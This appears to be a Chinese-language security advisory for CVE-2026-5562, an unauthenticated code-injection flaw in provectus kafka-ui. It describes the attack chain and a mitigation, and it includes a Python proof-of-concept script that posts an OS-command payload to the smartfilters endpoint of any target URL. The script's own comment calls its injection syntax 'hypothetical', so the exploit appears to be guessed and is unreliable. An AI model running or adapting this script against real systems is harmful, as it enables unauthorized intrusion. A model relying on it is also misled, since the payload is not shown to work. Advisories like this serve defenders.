CVE-2026-5562 provectus kafka-ui代码注入漏洞

漏洞信息

漏洞编号

CVE-2026-5562

漏洞类型

代码注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

provectus kafka-ui

漏洞概述

provectus kafka-ui是一款流行的Apache Kafka管理界面。在其0.7.2及之前的版本中，发现了一个高危安全漏洞。该漏洞源于`/api/smartfilters/testexecutions`端点的`validateAccess`函数未能正确过滤输入，导致存在代码注入风险。攻击者无需通过身份认证，即可远程发起攻击，进而控制服务器。鉴于利用代码已公开且厂商未回应，建议用户尽快采取防护措施。

技术细节

该漏洞的根本原因在于应用程序对用户输入缺乏严格的校验机制。具体来说，provectus kafka-ui在`/api/smartfilters/testexecutions`端点实现的`validateAccess`函数中，直接将用户提交的参数传递给了执行引擎，而未进行有效的安全过滤或沙箱隔离。攻击者可以精心构造包含恶意代码的HTTP请求包发送至该接口。当后端服务尝试解析并处理这些请求时，恶意代码会被服务器动态执行。这种远程代码执行（RCE）风险允许攻击者在目标系统上运行任意系统命令，从而窃取数据、篡改配置或进一步横向移动。鉴于该漏洞无需身份认证且利用难度低，其对暴露在互联网上的Kafka-UI实例构成了极大的安全威胁。

攻击链分析

STEP 1

侦察

攻击者扫描网络，识别暴露在互联网上的provectus kafka-ui服务实例。

STEP 2

漏洞利用

攻击者向`/api/smartfilters/testexecutions`端点发送特制的恶意JSON数据包，利用`validateAccess`函数的代码注入缺陷。

STEP 3

代码执行

服务器端解析恶意载荷，执行攻击者注入的任意系统命令。

STEP 4

权限提升与持久化

攻击者利用执行权限获取服务器控制权，安装后门或窃取敏感配置信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# PoC for CVE-2026-5562
# Description: Code injection in provectus kafka-ui via /api/smartfilters/testexecutions
# Usage: python poc.py <target_url>

def send_exploit(target):
    url = f"{target}/api/smartfilters/testexecutions"
    
    # Malicious payload attempting to execute code
    # Based on the vulnerable function validateAccess
    payload = {
        "filter": "test",
        # Hypothetical injection syntax to trigger code execution
        "value": "__import__('os').system('id')"
    }

    headers = {
        "Content-Type": "application/json"
    }

    try:
        print(f"[*] Sending exploit request to {url}...")
        response = requests.post(url, json=payload, headers=headers, timeout=10)
        
        if response.status_code == 200:
            print("[+] Request sent successfully. Check if command was executed.")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[-] Server returned status code: {response.status_code}")
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} http://<target_host>:<port>")
    else:
        send_exploit(sys.argv[1])

影响范围

provectus kafka-ui <= 0.7.2

防御指南

临时缓解措施

由于厂商尚未响应，建议立即通过网络访问控制（ACL）限制对Kafka-UI管理后台的访问，仅允许内网可信IP连接。同时，检查系统日志中是否存在对`/api/smartfilters/testexecutions`的可疑访问记录。在防火墙或反向代理层面配置规则，阻断包含特定恶意特征的流量。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5562
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5562
3 Details https://www.cvedetails.com/cve/CVE-2026-5562/
4 VulDB https://vuldb.com/cve/CVE-2026-5562
5 Link https://drive.google.com/file/d/18-Q4tb19y_7dwchnTCgcwfbox0Uj6oQd/view
6 Link https://vuldb.com/submit/782941
7 Link https://vuldb.com/vuln/355332
8 Link https://vuldb.com/vuln/355332/cti